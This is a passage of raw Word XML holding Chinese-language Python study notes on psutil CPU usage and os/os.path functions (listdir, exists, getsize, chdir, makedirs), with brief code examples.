          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>datetime1 &lt;= datetime2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    else</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFBE76D" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRPr="001E6532" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6D8CC3" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C433AE3" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRPr="00021B6B" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0255AC42" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339036C0" w14:textId="77777777" w:rsidR="00021B6B" w:rsidRDefault="00021B6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53494127" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="_Toc159779928"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：获取主机信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
    </w:p>
    <w:p w14:paraId="3C5561F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329C10AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2838B5C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A299F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F875B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="486" w:name="_Toc159779929"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cpu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p w14:paraId="20C7B130" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psutil.cpu_percent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E54685" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="OLE_LINK40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/lh1136863240/article/details/82774378</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF2C1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DC3F89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537E2CEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>psutil.cpu_percent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
      <w:r>
        <w:t>(interval=1, percpu=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8E8F36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">interval </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用率的时间间隔，默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18E1E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">percpu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是选择总的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F7292" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>percpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话就会返回一个数组，其中包含了两个值（此时双核</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），而为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话就只有一个值了。所以说当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>percpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候，会返回每一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用率，而为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是总使用率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFB3D74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="437172FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72554AD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="488" w:name="_Toc159779930"/>
      <w:bookmarkStart w:id="489" w:name="OLE_LINK39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:bookmarkEnd w:id="489"/>
    <w:p w14:paraId="10B57FEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF912B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="774FE718" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="490" w:name="_Toc159779931"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.listdir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出目录下文件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="490"/>
    </w:p>
    <w:p w14:paraId="4F618425" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B17662A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB75A95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="_Toc159779932"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w14:paraId="441AF3C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.path.exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断文件、文件夹是否存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905DCB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://gist.github.com/baymaxium/8dc4a78656b02f9b1e5e707d42664f3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F09199" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380E7ADE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>判断文件是否存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C59C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095D4445" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10D325" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.path.exists(test_file.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281289A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF86F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.path.exists(no_exist_file.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8B413" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225125A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1E4EF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>判断文件夹是否存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7FE4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127375AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.path.exists(test_dir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275BC3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C38D49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.path.exists(no_exist_dir)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FFF9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CDF88F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C56D93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>可以看出用</w:t>
      </w:r>
      <w:r>
        <w:t>os.path.exists()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，判断文件和文件夹是一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F098242" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD7005C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.path.getsize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：获取文件的大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65358FDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52DC9482" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for i in mp_list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733A11CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>os.path.getsize(i)</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C99F65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            csv2concatList.append(pd.read_csv(i))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4A8E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F007D23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CD6BAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A89C06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="_Toc159779933"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os.chdir:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改当前工作目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p w14:paraId="1676534C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466382A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.chdir("</w:t>
      </w:r>
      <w:r>
        <w:t>目标目录</w:t>
      </w:r>
      <w:r>
        <w:t>")   #</w:t>
      </w:r>
      <w:r>
        <w:t>修改当前工作目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70858DE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>os.getcwd()    #</w:t>
      </w:r>
      <w:r>
        <w:t>获取当前工作目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0DCC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C42E22A" w14:textId="63E4B4CD" w:rsidR="004C452C" w:rsidRDefault="000E3856" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="493" w:name="_Toc159779934"/>
      <w:r w:rsidRPr="000E3856">
        <w:t>os.makedirs</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建多层目录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w14:paraId="57F90CF0" w14:textId="1177B7C2" w:rsidR="000E3856" w:rsidRDefault="00790923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790923">
        <w:t xml:space="preserve">os.makedirs(self.mirror_dir, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exist_ok=True</w:t>
      </w:r>
      <w:r w:rsidRPr="00790923">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D14AFE" w14:textId="4CE2019C" w:rsidR="00790923" w:rsidRDefault="00790923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># os.makedirs </w:t>
      </w:r>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以创建不存在的多层目录，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> a/b/c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7ECAB" w14:textId="27ADA732" w:rsidR="000E3856" w:rsidRDefault="00790923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>exist_ok == True</w:t>
      </w:r>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00790923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果目录已经存在，则其如果默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则引发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>OSError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>；如果为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r w:rsidRPr="00F649A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指目录保持不动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754EC4B4" w14:textId="7AC23A99" w:rsidR="000E3856" w:rsidRPr="000E3856" w:rsidRDefault="000E3856" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2706"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
